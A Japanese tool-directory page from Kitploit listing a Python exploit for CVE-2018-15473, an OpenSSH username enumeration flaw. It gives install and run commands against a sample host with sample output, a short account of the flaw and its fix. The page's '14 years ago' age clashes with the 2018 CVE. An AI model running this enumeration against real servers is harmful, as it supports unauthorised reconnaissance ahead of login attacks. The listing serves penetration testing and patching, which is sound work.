Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-15473 — CVE-2018-15473のPythonベースのエクスプロイト。認証応答オラクルを介してOpenSSHのユーザー名列挙を可能にし、単一ユーザーモードとワードリストモードを備えています。 | Kitploit
ツール/GitHubGitHub/0xrobiul/cve-2018-15473
偵察脆弱性分析エクスプロイト情報収集ネットワークセキュリティペネトレーションテスト
GitHub0xrobiul/cve-2018-15473

CVE-2018-15473

CVE-2018-15473のPythonベースのエクスプロイト。認証応答オラクルを介してOpenSSHのユーザー名列挙を可能にし、単一ユーザーモードとワードリストモードを備えています。

リポジトリを見る
14年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-15473

SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Original exploit の編集版: https://www.exploit-db.com/exploits/45233

  • Python3 に変換済み

  • ユーザー名ワードリストオプションを追加

実行方法

root@kitploit:~

#Install the requirements:

foo@bar:~$ pip3 install -r requirements.txt

root@kitploit:~

#For single username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root is a valid username

root@kitploit:~

#For multiple username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root is a valid username

[-] mysql is an invalid username

[-] mike is an invalid username

[-] foo is an invalid username

[-] bar is an invalid username

Valid Users: 

root

root@kitploit:~

#For more option:

foo@bar:~$ ./Exploit.py -h

脆弱性について:

システムは、有効な認証試行と無効な認証試行に対して異なる応答を返します。リモートユーザーは、特別に細工されたリクエストを送信して、ターゲットシステム上の有効なユーザー名を特定できます。これにより、リモートユーザーはターゲットシステム上の有効なユーザー名を判別できます。

解決策:

OpenSSH サーバーをバージョン 7.7 以上にアップグレードする必要があります。

ツールをダウンロード